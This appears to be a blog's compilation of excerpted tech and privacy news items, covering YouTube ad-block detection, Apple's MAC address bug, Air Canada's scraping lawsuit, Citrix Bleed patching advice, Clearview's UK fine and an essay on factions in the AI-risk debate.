Asked how he hopes the Irish DPC will respond, Hanff replied via email, “I would expect the DPC to investigate and issue an enforcement notice to YouTube requiring them to cease and desist these activities without first obtaining consent (as per [Europe’s General Data Protection Regulation (GDPR)] standard) for the deployment of their spyware detection scripts; and further to order YouTube to unban any accounts which have been banned as a result of these detections and to delete any personal data processed unlawfully (see Article 5(1) of GDPR) since they first started to deploy their spyware detection scripts.”

Hanff’s use of strikethrough formatting acknowledges the legal difficulty of using the term “spyware” to refer to YouTube’s ad block detection code. The security industry’s standard defamation defense terminology for such stuff is PUPs, or potentially unwanted programs.

[…]

Hanff’s contention that ad-blocker detection without consent is unlawful in the EU was challenged back in 2016 by the maker of a detection tool called BlockAdblock. The software maker’s argument is that JavaScript code is not stored in the way considered in Article 5(3), which the firm suggests was intended for cookies.

Hanff disagrees, and maintains that “The Commission and the legislators have been very clear that any access to a user’s terminal equipment which is not strictly necessary for the provision of a requested service, requires consent.

“This is also bound by CJEU Case C-673/17 (Planet49) from October 2019 which *all* Member States are legally obligated to comply with, under the [Treaty on the Functioning of the European Union] – there is no room for deviation on this issue,” he elaborated.

“If a script or other digital technology is strictly necessary (technically required to deliver the requested service) then it is exempt from the consent requirements and as such would pose no issue to publishers engaging in legitimate activities which respect fundamental rights under the Charter.

“It is long past time that companies meet their legal obligations for their online services,” insisted Hanff. “This has been law since 2002 and was further clarified in 2009, 2012, and again in 2019 – enough is enough.”

Google did not respond to a request for comment.

Source: Privacy advocate challenges YouTube’s ad blocking detection • The Register

Airbus commissions three wind-powered ships

The plane-maker on Thursday revealed it has “commissioned shipowner Louis Dreyfus Armateurs to build, own and operate these new, highly efficient vessels that will enter into service from 2026.”

The ships will have conventional engines that run on maritime diesel oil and e-methanol, the latter fuel made with a process that produces less CO2 than other efforts. Many ships run on heavy fuel oil, the gloopiest, dirtiest, and cheapest of the fuel oils. Airbus has therefore gone out of its way with the choice of diesel and e-methanol.

The ships will also feature half a dozen Flettner rotors, rotating cylinders that produce the Magnus effect – a phenomenon that produces lift thanks to pressure differences on either side of a rotating object. The rotors were invented over a century ago and are generating renewed interest as they reduce ships’ fuel requirements.

Here’s what they’ll look like on Airbus’s boats.

Airbus's future ocean transports

Airbus’s future ocean transports – Click to enlarge

Airbus expects its three vessels to enter service from 2026 and has calculated they will reduce its average annual transatlantic CO2 emissions from 68,000 to 33,000 tonnes by 2030.[…]

The craft will have capacity to move around seventy 40-foot containers and six single-aisle aircraft sub assembly sets – wings, fuselage, engine pylons, horizontal and vertical tail planes. Airbus’s current ships can only move three or four of those sets.

The ships will most often travel from Saint-Nazaire, France, to an A320 assembly line in Mobile, Alabama. […]

Source: Airbus commissions three wind-powered ships • The Register

Apple’s MAC Address Privacy Feature Has Never Worked

Ever since Apple re-branded as the “Privacy” company several years back, it’s been rolling out features designed to show its commitment to protecting users. Yet while customers might feel safer using an iPhone, there’s already plenty of evidence that Apple’s branding efforts don’t always match the reality of its products. In fact, a lot of its privacy features don’t actually seem to work.

Case in point: new research shows that one of Apple’s proffered privacy tools—a feature that was supposed to anonymize mobile users’ connections to Wifi—is effectively “useless.” In 2020, Apple debuted a feature that, when switched on, was supposed to hide an iPhone user’s media access control—or MAC—address. When a device connects to a WiFi network, it must first send out its MAC address so the network can identify it; when the same MAC address pops up in network after network, it can be used to by network observers to identify and track a specific mobile user’s movements.

Apple’s feature was supposed to provide randomized MAC addresses for users as a way of stop this kind of tracking from happening. But, apparently, a bug in the feature persisted for years that made the feature effectively useless.

According to a new report from Ars Technica, researchers recently tested the feature to see if it actually concealed their MAC addresses, only to find that it didn’t do that at all. Ars writes:

Despite promises that this never-changing address would be hidden and replaced with a private one that was unique to each SSID, Apple devices have continued to display the real one, which in turn got broadcast to every other connected device on the network.

One of the researchers behind the discovery of the vulnerability, Tommy Mysk, told Ars that, from the jump, “this feature was useless because of this bug,” and that, try as they might, he “couldn’t stop the devices from sending these discovery requests, even with a VPN. Even in the Lockdown Mode.”

What Apple’s justification for advertising a feature that just plainly does not work is, I’m not sure. Gizmodo reached out to the company for comment and will update this story if they respond. A recent update, iOS 17.1, apparently patches the problem and ensures that the feature actually works.

Source: Apple’s MAC Address Privacy Feature Has Never Worked

Android 14 Storage Bug: Users with multiple profiles Locked Out of Devices

Android 14, the latest operating system from Google, is facing a major storage bug that is causing users to be locked out of their devices. This issue is particularly affecting users who utilize the “multiple profiles” feature. Reports suggest that the bug is comparable to being hit with “ransomware,” as users are unable to access their device storage.

Initially, it was believed that this bug was limited to the Pixel 6, but it has since been discovered that it impacts a wider range of devices upgrading to Android 14. This includes the Pixel 6, 6a, 7, 7a, Pixel Fold, and Pixel Tablet. The Google issue tracker for this bug has garnered over 350 replies, but there has been no response from Google so far. The bug has been assigned the medium priority level of “P2” and remains unassigned, indicating that no one is actively investigating it.

Users who have encountered this storage bug have shared log files containing concerning messages such as “Failed to open directory /data/media/0: Structure needs cleaning.” This issue leads to various problematic situations, with some users experiencing boot loops, others stuck on a “Pixel is starting…” message, and some unable to take screenshots or access their camera app due to the lack of storage. Users are also unable to view files on their devices from a PC over USB, and the System UI and Settings repeatedly crash. Essentially, without storage, the device becomes practically unusable.

Android’s user-profile system, designed to accommodate multiple users and separate work and personal profiles, appears to be the cause of this rarely encountered bug. Users have reported that the primary profile, which is typically the most important one, becomes locked out.

Source: Android 14 Storage Bug: Users Locked Out of Devices

Google turned ANC earbuds into heart rate sensor

Google today detailed its research into audioplethysmography (APG) that adds heart rate sensing capabilities to active noise canceling (ANC) headphones and earbuds “with a simple software upgrade.”

Google says the “ear canal [is] an ideal location for health sensing” given that the deep ear artery “forms an intricate network of smaller vessels that extensively permeate the auditory canal.”

This audioplethysmography approach works by “sending a low intensity ultrasound probing signal through an ANC headphone’s speakers.”

This signal triggers echoes, which are received via on-board feedback microphones. We observe that the tiny ear canal skin displacement and heartbeat vibrations modulate these ultrasound echoes.

A model that Google created works to process that feedback into a heart rate reading, as well as heart rate variability (HRV) measurement. This technique works even with music playing and “bad earbuds seals.” However, it was impacted by body motion, and Google countered with a multi-tone approach that serves as a calibration tool to “find the best frequency that measures heart rate, and use only the best frequency to get high-quality pulse waveform.”

Google performed two sets of studies with 153 people that found APG “achieves consistently accurate heart rate (3.21% median error across participants in all activity scenarios) and heart rate variability (2.70% median error in inter-beat interval) measurements.”

Compared to existing HR sensors, it’s not impacted by skin tones. Ear canal size and “sub-optimal seal conditions” also do not impact accuracy. Google believes this is a better approach than putting traditional photoplethysmograms (PPG) and electrocardiograms (ECG) sensors, as well as a microcontroller, in headphones/earbuds:

…this sensor mounting paradigm inevitably adds cost, weight, power consumption, acoustic design complexity, and form factor challenges to hearables, constituting a strong barrier to its wide adoption.

Google closes on:

APG transforms any TWS ANC headphones into smart sensing headphones with a simple software upgrade, and works robustly across various user activities. The sensing carrier signal is completely inaudible and not impacted by music playing. More importantly, APG represents new knowledge in biomedical and mobile research and unlocks new possibilities for low-cost health sensing.

“APG is the result of collaboration across Google Health, product, UX and legal teams,” so this coming to Pixel Buds is far from guaranteed at this point.

Source: Google turned ANC earbuds into heart rate sensor

AI Risks – doomsayers, warriors, reformers

There is no shortage of researchers and industry titans willing to warn us about the potential destructive power of artificial intelligence. Reading the headlines, one would hope that the rapid gains in AI technology have also brought forth a unifying realization of the risks—and the steps we need to take to mitigate them.

The reality, unfortunately, is quite different. Beneath almost all of the testimony, the manifestoes, the blog posts, and the public declarations issued about AI are battles among deeply divided factions. Some are concerned about far-future risks that sound like science fiction. Some are genuinely alarmed by the practical problems that chatbots and deepfake video generators are creating right now. Some are motivated by potential business revenue, others by national security concerns.

The result is a cacophony of coded language, contradictory views, and provocative policy demands that are undermining our ability to grapple with a technology destined to drive the future of politics, our economy, and even our daily lives.

These factions are in dialogue not only with the public but also with one another. Sometimes, they trade letters, opinion essays, or social threads outlining their positions and attacking others’ in public view. More often, they tout their viewpoints without acknowledging alternatives, leaving the impression that their enlightened perspective is the inevitable lens through which to view AI But if lawmakers and the public fail to recognize the subtext of their arguments, they risk missing the real consequences of our possible regulatory and cultural paths forward.

To understand the fight and the impact it may have on our shared future, look past the immediate claims and actions of the players to the greater implications of their points of view. When you do, you’ll realize this isn’t really a debate only about AI. It’s also a contest about control and power, about how resources should be distributed and who should be held accountable.

Beneath this roiling discord is a true fight over the future of society. Should we focus on avoiding the dystopia of mass unemployment, a world where China is the dominant superpower or a society where the worst prejudices of humanity are embodied in opaque algorithms that control our lives? Should we listen to wealthy futurists who discount the importance of climate change because they’re already thinking ahead to colonies on Mars? It is critical that we begin to recognize the ideologies driving what we are being told. Resolving the fracas requires us to see through the specter of AI to stay true to the humanity of our values.

One way to decode the motives behind the various declarations is through their language. Because language itself is part of their battleground, the different AI camps tend not to use the same words to describe their positions. One faction describes the dangers posed by AI through the framework of safety, another through ethics or integrity, yet another through security, and others through economics. By decoding who is speaking and how AI is being described, we can explore where these groups differ and what drives their views.

The Doomsayers

The loudest perspective is a frightening, dystopian vision in which AI poses an existential risk to humankind, capable of wiping out all life on Earth. AI, in this vision, emerges as a godlike, superintelligent, ungovernable entity capable of controlling everything. AI could destroy humanity or pose a risk on par with nukes. If we’re not careful, it could kill everyone or enslave humanity. It’s likened to monsters like the Lovecraftian shoggoths, artificial servants that rebelled against their creators, or paper clip maximizers that consume all of Earth’s resources in a single-minded pursuit of their programmed goal. It sounds like science fiction, but these people are serious, and they mean the words they use.

These are the AI safety people, and their ranks include the “Godfathers of AI,” Geoff Hinton and Yoshua Bengio. For many years, these leading lights battled critics who doubted that a computer could ever mimic capabilities of the human mind. Having steamrollered the public conversation by creating large language models like ChatGPT and other AI tools capable of increasingly impressive feats, they appear deeply invested in the idea that there is no limit to what their creations will be able to accomplish.

This doomsaying is boosted by a class of tech elite that has enormous power to shape the conversation. And some in this group are animated by the radical effective altruism movement and the associated cause of long-term-ism, which tend to focus on the most extreme catastrophic risks and emphasize the far-future consequences of our actions. These philosophies are hot among the cryptocurrency crowd, like the disgraced former billionaire Sam Bankman-Fried, who at one time possessed sudden wealth in search of a cause.

Reasonable sounding on their face, these ideas can become dangerous if stretched to their logical extremes. A dogmatic long-termer would willingly sacrifice the well-being of people today to stave off a prophesied extinction event like AI enslavement.

Many doomsayers say they are acting rationally, but their hype about hypothetical existential risks amounts to making a misguided bet with our future. In the name of long-term-ism, Elon Musk reportedly believes that our society needs to encourage reproduction among those with the greatest culture and intelligence (namely, his ultrarich buddies). And he wants to go further, such as limiting the right to vote to parents and even populating Mars. It’s widely believed that Jaan Tallinn, the wealthy long-termer who co-founded the most prominent centers for the study of AI safety, has made dismissive noises about climate change because he thinks that it pales in comparison with far-future unknown unknowns like risks from AI. The technology historian David C. Brock calls these fears “wishful worries”—that is, “problems that it would be nice to have, in contrast to the actual agonies of the present.”

More practically, many of the researchers in this group are proceeding full steam ahead in developing AI, demonstrating how unrealistic it is to simply hit pause on technological development. But the roboticist Rodney Brooks has pointed out that we will see the existential risks coming—the dangers will not be sudden and we will have time to change course. While we shouldn’t dismiss the Hollywood nightmare scenarios out of hand, we must balance them with the potential benefits of AI and, most important, not allow them to strategically distract from more immediate concerns. Let’s not let apocalyptic prognostications overwhelm us and smother the momentum we need to develop critical guardrails.

The Reformers

While the doomsayer faction focuses on the far-off future, its most prominent opponents are focused on the here and now. We agree with this group that there’s plenty already happening to cause concern: Racist policing and legal systems that disproportionately arrest and punish people of color. Sexist labor systems that rate feminine-coded résumés lower. Superpower nations automating military interventions as tools of imperialism and, someday, killer robots.

The alternative to the end-of-the-world, existential risk narrative is a distressingly familiar vision of dystopia: a society in which humanity’s worst instincts are encoded into and enforced by machines. The doomsayers think AI enslavement looks like the Matrix; the reformers point to modern-day contractors doing traumatic work at low pay for OpenAI in Kenya.

Propagators of these AI ethics concerns—like Meredith Broussard, Safiya Umoja Noble, Rumman Chowdhury, and Cathy O’Neil—have been raising the alarm on inequities coded into AI for years. Although we don’t have a census, it’s noticeable that many leaders in this cohort are people of color, women, and people who identify as LGBTQ. They are often motivated by insight into what it feels like to be on the wrong end of algorithmic oppression and by a connection to the communities most vulnerable to the misuse of new technology. Many in this group take an explicitly social perspective: When Joy Buolamwini founded an organization to fight for equitable AI, she called it the Algorithmic Justice League. Ruha Benjamin called her organization the Ida B. Wells Just Data Lab.

Others frame efforts to reform AI in terms of integrity, calling for Big Tech to adhere to an oath to consider the benefit of the broader public alongside—or even above—their self-interest. They point to social media companies’ failure to control hate speech or how online misinformation can undermine democratic elections. Adding urgency for this group is that the very companies driving the AI revolution have, at times, been eliminating safeguards. A signal moment came when Timnit Gebru, a co-leader of Google’s AI ethics team, was dismissed for pointing out the risks of developing ever-larger AI language models.

While doomsayers and reformers share the concern that AI must align with human interests, reformers tend to push back hard against the doomsayers’ focus on the distant future. They want to wrestle the attention of regulators and advocates back toward present-day harms that are exacerbated by AI misinformation, surveillance, and inequity. Integrity experts call for the development of responsible AI, for civic education to ensure AI literacy and for keeping humans front and center in AI systems.

This group’s concerns are well documented and urgent—and far older than modern AI technologies. Surely, we are a civilization big enough to tackle more than one problem at a time; even those worried that AI might kill us in the future should still demand that it not profile and exploit us in the present.

The Warriors

Other groups of prognosticators cast the rise of AI through the language of competitiveness and national security. One version has a post-9/11 ring to it—a world where terrorists, criminals, and psychopaths have unfettered access to technologies of mass destruction. Another version is a Cold War narrative of the United States losing an AI arms race with China and its surveillance-rich society.

Some arguing from this perspective are acting on genuine national security concerns, and others have a simple motivation: money. These perspectives serve the interests of American tech tycoons as well as the government agencies and defense contractors they are intertwined with.

OpenAI’s Sam Altman and Meta’s Mark Zuckerberg, both of whom lead dominant AI companies, are pushing for AI regulations that they say will protect us from criminals and terrorists. Such regulations would be expensive to comply with and are likely to preserve the market position of leading AI companies while restricting competition from start-ups. In the lobbying battles over Europe’s trailblazing AI regulatory framework, US megacompanies pleaded to exempt their general-purpose AI from the tightest regulations, and whether and how to apply high-risk compliance expectations on noncorporate open-source models emerged as a key point of debate. All the while, some of the moguls investing in upstart companies are fighting the regulatory tide. The Inflection AI co-founder Reid Hoffman argued, “The answer to our challenges is not to slow down technology but to accelerate it.”

Any technology critical to national defense usually has an easier time avoiding oversight, regulation, and limitations on profit. Any readiness gap in our military demands urgent budget increases and funds distributed to the military branches and their contractors, because we may soon be called upon to fight. Tech moguls like Google’s former chief executive Eric Schmidt, who has the ear of many lawmakers, signal to American policymakers about the Chinese threat even as they invest in US national security concerns.

The warriors’ narrative seems to misrepresent that science and engineering are different from what they were during the mid-twentieth century. AI research is fundamentally international; no one country will win a monopoly. And while national security is important to consider, we must also be mindful of self-interest of those positioned to benefit financially.


As the science-fiction author Ted Chiang has said, fears about the existential risks of AI are really fears about the threat of uncontrolled capitalism, and dystopias like the paper clip maximizer are just caricatures of every start-up’s business plan. Cosma Shalizi and Henry Farrell further argue that “we’ve lived among shoggoths for centuries, tending to them as though they were our masters” as monopolistic platforms devour and exploit the totality of humanity’s labor and ingenuity for their own interests. This dread applies as much to our future with AI as it does to our past and present with corporations.

Regulatory solutions do not need to reinvent the wheel. Instead, we need to double down on the rules that we know limit corporate power. We need to get more serious about establishing good and effective governance on all the issues we lost track of while we were becoming obsessed with AI, China, and the fights picked among robber barons.

By analogy to the healthcare sector, we need an AI public option to truly keep AI companies in check. A publicly directed AI development project would serve to counterbalance for-profit corporate AI and help ensure an even playing field for access to the twenty-first century’s key technology while offering a platform for the ethical development and use of AI.

Also, we should embrace the humanity behind AI. We can hold founders and corporations accountable by mandating greater AI transparency in the development stage, in addition to applying legal standards for actions associated with AI. Remarkably, this is something that both the left and the right can agree on.

Ultimately, we need to make sure the network of laws and regulations that govern our collective behavior is knit more strongly, with fewer gaps and greater ability to hold the powerful accountable, particularly in those areas most sensitive to our democracy and environment. As those with power and privilege seem poised to harness AI to accumulate much more or pursue extreme ideologies, let’s think about how we can constrain their influence in the public square rather than cede our attention to their most bombastic nightmare visions for the future.

This essay was written with Nathan Sanders, and previously appeared in the New York Times.

Source: AI Risks – Schneier on Security

Air Canada Sues Website That Helps People Book More Flights simultaneously Calls own website team incompetent beyond belief

I am so frequently confused by companies that sue other companies for making their own sites and services more useful. It happens quite often. And quite often, the lawsuits are questionable CFAA claims against websites that scrape data to provide a better consumer experience, but one that still ultimately benefits the originating site.

Over the last few years various airlines have really been leading the way on this, with Southwest being particularly aggressive in suing companies that help people find Southwest flights to purchase. Unfortunately, many of these lawsuits are succeeding, to the point that a court has literally said that a travel company can’t tell others how much Southwest flights cost.

But the latest lawsuit of this nature doesn’t involve Southwest, and is quite possibly the dumbest one. Air Canada has sued the site Seats.aero that helps users figure out the best flights for their frequent flyer miles. Seats.aero is a small operation run by the company with the best name ever: Localhost, meaning that the lawsuit is technically “Air Canada v. Localhost” which sounds almost as dumb as this lawsuit is.

The Air Canada Group brings this action because Mr. Ian Carroll—through Defendant Localhost LLC—created a for-profit website and computer application (or “app”)— both called Seats.aero—that use substantial amounts of data unlawfully scraped from the Air Canada Group’s website and computer systems. In direct violation of the Air Canada Group’s web terms and conditions, Carroll uses automated digital robots (or “bots”) to continuously search for and harvest data from the Air Canada Group’s website and database. His intrusions are frequent and rapacious, causing multiple levels of harm, e.g., placing an immense strain on the Air Canada Group’s computer infrastructure, impairing the integrity and availability of the Air Canada Group’s data, soiling the customer experience with the Air Canada Group, interfering with the Air Canada Group’s business relations with its partners and customers, and diverting the Air Canada Group’s resources to repair the damage. Making matters worse, Carroll uses the Air Canada Group’s federally registered trademarks and logo to mislead people into believing that his site, app, and activities are connected with and/or approved by the real Air Canada Group and lending an air of legitimacy to his site and app. The Air Canada Group has tried to stop Carroll’s activities via a number of technological blocking measures. But each time, he employs subterfuge to fraudulently access and take the data—all the while boasting about his exploits and circumvention online.

Almost nothing in this makes any sense. Having third parties scrape sites for data about prices is… how the internet works. Whining about it is stupid beyond belief. And here, it’s doubly stupid, because anyone who finds a flight via seats.aero is then sent to Air Canada’s own website to book that flight. Air Canada is making money because Carroll’s company is helping people find Air Canada flights they can take.

Why are they mad?

Air Canada’s lawyers also seem technically incompetent. I mean, what the fuck is this?

Through screen scraping, Carroll extracts all of the data displayed on the website, including the text and images.

Carroll also employs the more intrusive API scraping to further feed Defendant’s website.

If the “API scraping” is “more intrusive” than screen scraping, you’re doing your APIs wrong. Is Air Canada saying that its tech team is so incompetent that its API puts more load on the site than scraping? Because, if so, Air Canada should fire its tech team. The whole point of an API is to make it easier for those accessing data from your website without needing to do the more cumbersome process of scraping.

And, yes, this lawsuit really calls into question Air Canada’s tech team and their ability to run a modern website. If your website can’t handle having its flights and prices scraped a few times every day, then you shouldn’t have a website. Get some modern technology, Air Canada:

Defendant’s avaricious data scraping generates frequent and myriad requests to the Air Canada Group’s database—far in excess of what the Air Canada Group’s infrastructure was designed to handle. Its scraping collects a large volume of data, including flight data within a wide date range and across extensive flight origins and destinations—multiple times per day.

Maybe… invest in better infrastructure like basically every other website that can handle some basic scraping? Or, set up your API so it doesn’t fall over when used for normal API things? Because this is embarrassing:

At times, Defendant’s voluminous requests have placed such immense burdens on the Air Canada Group’s infrastructure that it has caused “brownouts.” During a brownout, a website is unresponsive for a period of time because the capacity of requests exceeds the capacity the website was designed to accommodate. During brownouts caused by Defendant’s data scraping, legitimate customers are unable to use or the Air Canada + Aeroplan mobile app, including to search for available rewards, redeem Aeroplan points for the rewards, search for and view reward travel availability, book reward flights, contact Aeroplan customer support, and/or obtain service through the Aeroplan contact center due to the high volume of calls during brownouts.

Air Canada’s lawyers also seem wholly unfamiliar with the concept of nominative fair use for trademarks. If you’re displaying someone’s trademarks for the sake of accurately talking about them, there’s no likelihood of confusion and no concern about the source of the information. Air Canada claiming that this is trademark infringement is ridiculous:

I guarantee that no one using Seats.aero thinks that they’re on Air Canada’s website.

The whole thing is so stupid that it makes me never want to fly Air Canada again. I don’t trust an airline that can’t set up its website/API to handle someone making its flights more attractive to buyers.

But, of course, in these crazy times with the way the CFAA has been interpreted, there’s a decent chance Air Canada could win.

For its part, Carroll says that he and his lawyers have reached out to Air Canada “repeatedly” to try to work with them on how they “retrieve availability information,” and that “Air Canada has ignored these offers.” He also notes that tons of other websites are scraping the very same information, and he has no idea why he’s been singled out. He further notes that he’s always been open to adjusting the frequency of searches and working with the airlines to make sure that his activities don’t burden the website.

But, really, the whole thing is stupid. The only thing that Carroll’s website does is help people buy more flights. It points people to the Air Canada site to buy tickets. It makes people want to fly more on Air Canada.

Why would Air Canada want to stop that other than that it can’t admit that it’s website operations should all be replaced by a more competent team?

Source: Air Canada Would Rather Sue A Website That Helps People Book More Flights Than Hire Competent Web Engineers | Techdirt

New French AI Copyright Law Would Effectively Tax AI Companies, Enrich French taxman

This blog has written a number of times about the reaction of creators to generative AI. Legal academic and copyright expert Andres Guadamuz has spotted what may be the first attempt to draw up a new law to regulate generative AI. It comes from French politicians, who have developed something of a habit of bringing in new laws attempting to control digital technology that they rarely understand but definitely dislike.

There are only four articles in the text of the proposal, which are intended to be added as amendments to existing French laws. Despite being short, the proposal contains some impressively bad ideas. The first of these is found in Article 2, which, as Guadamuz summarises, “assigns ownership of the [AI-generated] work (now protected by copyright) to the authors or assignees of the works that enabled the creation of the said artificial work.” Here’s the huge problem with that idea:

How can one determine the author of the works that facilitated the conception of the AI-generated piece? While it might seem straightforward if AI works are viewed as collages or summaries of existing copyrighted works, this is far from the reality. As of now, I’m unaware of any method to extract specific text from ChatGPT or an image from Midjourney and enumerate all the works that contributed to its creation. That’s not how these models operate.

Since there is no way to find out exactly who the creators are whose work helped generate a new piece of AI material using aggregated statistics, Guadamuz suggests that the French lawmakers might want creators to be paid according to their contribution to the training material that went into creating the generative AI system itself. Using his own writings as an example, he calculates what fraction of any given payout he would receive with this approach. For ChatGPT’s output, Guadamuz estimates he might receive 0.00001% of any payout that was made. To give an example, even if the licensing fee for a some hugely popular work generated using AI were €1,000,000, Guadamuz would only receive 10 cents. Most real-life payouts to creators would be vanishingly small.

Article 3 of the French proposal builds on this ridiculous approach by requiring the names of all the creators who contributed to some AI-generated output to be included in that work. But as Guadamuz has already noted, there’s no way to find out exactly whose works have contributed to an output, leaving the only option to include the names of every single creator whose work is present in the training set – potentially millions of names.

Interestingly, Article 4 seems to recognize the payment problem raised above, and offers a way to deal with it. Guadamuz explains:

As it will be not possible to find the author of an AI work (which remember, has copyright and therefore isn’t in the public domain), the law will place a tax on the company that operates the service. So it’s sort of in the public domain, but it’s taxed, and the tax will be paid by OpenAI, Google, Midjourney, StabilityAI, etc. But also by any open source operator and other AI providers (Huggingface, etc). And the tax will be used to fund the collective societies in France… so unless people are willing to join these societies from abroad, they will get nothing, and these bodies will reap the rewards.

In other words, the net effect of the French proposal seems to be to tax the emerging AI giants (mostly US companies) and pay the money to French collecting societies. Guadumuz goes so far as to say: “in my view, this is the real intention of the legislation”. Anyone who thinks this is a good solution might want to read Chapter 7 of Walled Culture the book (free digital versions available), which quotes from a report revealing “a long history of corruption, mismanagement, confiscation of funds, and lack of transparency [by collecting societies] that has deprived artists of the revenues they earned”. Trying to fit generative AI into the straitjacket of an outdated copyright system designed for books is clearly unwise; using it as a pretext for funneling yet more money away from creators and towards collecting societies is just ridiculous.

Source: New French AI Copyright Law Would Effectively Tax AI Companies, Enrich Collection Societies | Techdirt

Motorola’s concept slap bracelet smartphone looks convenient

Forget foldable phones, the next big trend could be gadgets that bend.

Lenovo, which is currently holding its ninth Tech World event in Austin, Texas, showed off its new collaboration with its subsidiary Motorola: a smartphone that can wrap around your wrist like a watch band.

It’s admittedly quite fascinating to see the tech in action. Lenovo calls its device the “Adaptive Display Concept”, which is comprised of a Full HD Plus resolution (2,228 x 1,080 pixels) pOLED screen that is able to “be bent and shaped into different” forms to meet the user’s needs. There’s no external hinge either as the prototype is a single-screen Android phone. The company explains bending it in half turns the 6.9-inch into one measuring 4.6 inches across. It can stand upright on the bent portion, in an arc, or wrap around a wrist as mentioned earlier.

Unfortunately, that’s all we know about the hardware itself. The Adaptive Display Concept did appear on stage at the Tech World 2023 where the presenter showed off its flexibility by placing it over her arm. Beyond that demonstration, though, both Lenovo and Motorola are keeping their lips sealed tight.

Source: Motorola’s concept ‘bracelet’ smartphone could be a clever final form for foldables | TechRadar

Empowering Responsible and Compliant Practices: Bridging the Gap for US Citizens and Corporations with the New EU-US Data Privacy Framework

The Data Privacy Framework (DPF) presents new legal guidance to facilitate personal data sharing between US companies and their counterparts in the EU and the UK. This framework empowers individuals with greater control over their personal data and streamlines business operations by creating common rules around interoperable dataflows. Moreover, the DPF will help enable clear contract terms and business codes of conduct for corporations that collect, use, and transfer personal data across borders.

Any business that collects data related to people in the EU must comply with the EU’s General Data Protection Regulation (GDPR), which is the toughest privacy and security law across the globe. Thus, the DPF helps US corporations avoid potentially hefty fines and penalties by ensuring their data transfers align with GDPR regulations.

Data transfer procedures, which were historically time-consuming and riddled with legal complications, are now faster and more straightforward with the DPF, which allows for more transatlantic dataflows agreed on by US companies and their EU and UK counterparts. On July 10, 2023, the European Commission finalized an adequacy decision that assures the US offers data protection levels similar to the EU’s.

[…]

US companies can register with the DPF through the Department of Commerce DPF website. Companies that previously self-certified compliance with the EU-US Privacy Shield can transition to DPF by recertifying their adherence to DPF principles, including updating privacy policies to reflect any change in procedures and data subject rights that are crucial for this transition. Businesses should develop privacy policies that identify an independent recourse mechanism that can address data protection concerns. To qualify for the DPF the company must fall under the jurisdiction of either the Federal Trade Commission or the US Department of Transportation, though this reach may broaden in the future.

Source: Empowering Responsible and Compliant Practices: Bridging the Gap for US Citizens and Corporations with the New EU-US Data Privacy Framework | American Enterprise Institute – AEI

The whole self-certification things seems leaky as a sieve to me… And once data has gone into the US intelligence services you can assume it will go everywhere and there will be no stopping it from the EU side.

Citrix urges “immediate” patching as exploit POC

Citrix has urged admins to “immediately” apply a fix for CVE-2023-4966, a critical information disclosure bug that affects NetScaler ADC and NetScaler Gateway, admitting it has been exploited.

Plus, there’s a proof-of-concept exploit, dubbed Citrix Bleed, now on GitHub. So if you are using an affected build, at this point assume you’ve been compromised, apply the update, and then kill all active sessions per Citrix’s advice from Monday.

The company’s first issued a patch for compromised devices on October 10, and last week Mandiant warned that criminals — most likely cyberspies — have been abusing this hole to hijack authentication sessions and steal corporate info since at least late August.

[…]

Also last week, Mandiant Consulting CTO Charles Carmakal warned that “organizations need to do more than just apply the patch — they should also terminate all active sessions. These authenticated sessions will persist after the update to mitigate CVE-2023-4966 has been deployed.”

Citrix, in the Monday blog, also echoed this mitigation advice and told customers to kill all active and persistent sessions using the following commands:

kill icaconnection -all

kill rdp connection -all

kill pcoipConnection -all

kill aaa session -all

clear lb persistentSessions

[…]

Source: Citrix urges “immediate” patching as exploit POC • The Register

Clearview Gets $10 Million UK Fine Reversed, Now Owes Slightly Less To Governments Around The World

Here’s how things went for the world’s most infamous purveyor of facial recognition tech when it came to its dealings with the United Kingdom. In a word: not great.

In addition to supplying its scraped data to known human rights abusers, Clearview was found to have supplied access to a multitude of UK and US entities. At that point (early 2020), it was also making its software available to a number of retailers, suggesting the tool its CEO claimed was instrumental in fighting serious crime (CSAM, terrorism) was just as great at fighting retail theft. For some reason, an anti-human-trafficking charity headed up by author J.K. Rowling was also on the customer list obtained by Buzzfeed.

Clearview’s relationship with the UK government soon soured. In December 2021, the UK government’s Information Commissioner’s Office (ICO) said the company had violated UK privacy laws with its non-consensual scraping of UK residents’ photos and data. That initial declaration from the ICO came with a $23 million fine attached, one that was reduced to a little less than $10 million ($9.4 million) roughly six months later, accompanied by demands Clearview immediately delete all UK resident data in its possession.

This fine was one of several the company managed to obtain from foreign governments. The Italian government — citing EU privacy law violations — levied a $21 million fine. The French government came to the same conclusions and the same penalty, adding another $21 million to Clearview’s European tab.

The facial recognition tech company never bothered to proclaim its innocence after being fined by the UK government. Instead, it simply stated the UK government had no power to enforce this fine because Clearview was a United States company with no physical presence in the United Kingdom.

In addition to engaging in reputational rehab on the UK front, Clearview went to court to challenge the fine levied by the UK government. And it appears to have won this round for the moment, reducing its accounts payable ledger by about $10 million, as Natasha Lomas reports for TechCrunch.

[I]n a ruling issued yesterday its legal challenge to the ICO prevailed on jurisdiction grounds after the tribunal ruled the company’s activities fall outside the jurisdiction of U.K. data protection law owing to an exemption related to foreign law enforcement.

Which is pretty much the argument Clearview made months ago, albeit less elegantly after it was first informed of the fine. The base argument is that Clearview is a US entity providing services to foreign entities and that it’s up to its foreign customers to comply with local laws, rather than Clearview itself.

That argument worked. And it worked because it appears the ICO chose the wrong law to wield against Clearview. The UK’s GDPR does not protect UK residents from actions taken by “competent authorities for law enforcement purposes.” (lol at that entire phrase.) Government customers of Clearview are only subject to the adopted parts of the EU’s Data Protection Act post-Brexit, which means the company’s (alleged) pivot to the public sector puts both its actions — and the actions of its UK law enforcement clients — outside of the reach of the GDPR.

Per the ruling, Clearview argued it’s a foreign company providing its service to “foreign clients, using foreign IP addresses, and in support of the public interest activities of foreign governments and government agencies, in particular in relation to their national security and criminal law enforcement functions.”

That’s enough to get Clearview off the hook. While the GDPR and EU privacy laws have extraterritorial provisions, they also make exceptions for law enforcement and national security interests. GDPR has more exceptions, which made it that much easier for Clearview to walk away from this penalty by claiming it only sold to entities subject to this exception.

Whether or not that’s actually true has yet to be determined. And it might have made more sense for ICO to prosecute this under the parts of EU law the UK government decided to adopt after deciding it no longer wanted to be part of this particular union.

Even if the charges had stuck, it’s unlikely Clearview would ever have paid the fine. According to its CEO and spokespeople, Clearview owes nothing to anyone. Whatever anyone posts publicly is fair game. And if the company wants to hoover up everything on the web that isn’t nailed down, well, that’s a problem for other people to be subjected to, possibly at gunpoint. Until someone can actually make something stick, all they’ve got is bills they can’t collect and a collective GFY from one of the least ethical companies to ever get into the facial recognition business.

